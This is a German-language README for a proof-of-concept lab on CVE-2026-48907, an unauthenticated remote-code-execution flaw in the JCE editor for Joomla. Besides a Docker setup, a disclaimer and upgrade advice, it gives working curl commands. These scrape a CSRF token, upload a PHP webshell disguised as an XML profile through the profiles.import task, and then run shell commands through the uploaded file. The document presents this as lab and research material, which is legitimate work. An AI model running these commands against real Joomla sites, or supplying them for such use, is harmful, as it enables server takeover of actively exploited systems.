
POC für CVE-2026-48907
PSsec Bildungs- und Sicherheitsforschungslabor für CVE-2026-48907.
CVE-2026-48907 ist eine kritische (CVSS 10.0) nicht authentifizierte Remote-Code-Ausführungssicherheitslücke in JCE (Joomla Content Editor), der am weitesten verbreiteten Editorerweiterung für Joomla, die alle Versionen ≤ 2.9.99.4 betrifft.
Der Endpunkt profiles.import akzeptiert Dateiuploads ohne Authentifizierung. Ein Angreifer kann eine bösartige PHP-Datei hochladen, die als XML-Profil getarnt ist, welche in das tmp/-Verzeichnis des Servers geschrieben und direkt über HTTP ausgeführt wird — keine Anmeldeinformationen erforderlich.
| Detail | Wert |
|---|
| CVE | CVE-2026-48907 |
| CVSS Score | 10.0 Kritisch |
| Betroffene Versionen | JCE ≤ 2.9.99.4 |
| Behobene Versionen | JCE ≥ 2.9.99.5 |
| CISA KEV gelistet | Ja — 16. Juni 2026 |
| Aktiv ausgenutzt | Ja |
docker compose up -d
Öffne http://localhost:8080 in deinem Browser und schließe den Installationsassistenten mit folgenden Anmeldedaten ab:
| Feld | Wert |
|---|---|
| Database Host | db |
| Database Name | joomla |
| Database User | joomla |
| Database Password | joomlapass |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
Dann im Joomla-Adminbereich: System → Erweiterungen → Installieren → lade die ZIP-Datei hoch.
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
Erwartete Ausgabe: uid=33(www-data) gid=33(www-data)
| Datei | Beschreibung |
|---|---|
docker-compose.yml | Startet angreifbares Joomla 5.3.1 + MySQL 8.0 |
shell.xml.php | Minimale PHP-Webshell-Payload |
instructions.txt | Schritt-für-Schritt-Ausnutzungshinweise |
Aktualisiere JCE sofort auf Version 2.9.99.5 oder höher.
Offizielle Herstellerberatung und kostenloser Patch für ältere Joomla-Versionen: JCE Security Update — joomlacontenteditor.net
Dieses Repository ist ausschließlich für Bildungs- und autorisierte Sicherheitsforschungszwecke gedacht.
Tests dürfen nur gegen Systeme durchgeführt werden, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis haben. Die unbefugte Nutzung dieses Materials gegen Systeme, die Ihnen nicht gehören, ist illegal und unethisch. Die Autoren und Pansophical OU übernehmen keine Haftung für Missbrauch dieses Inhalts.
Diese Laborumgebung ist absichtlich verwundbar. Setzen Sie sie nicht dem Internet oder einem nicht vertrauenswürdigen Netzwerk aus.
Von PSsec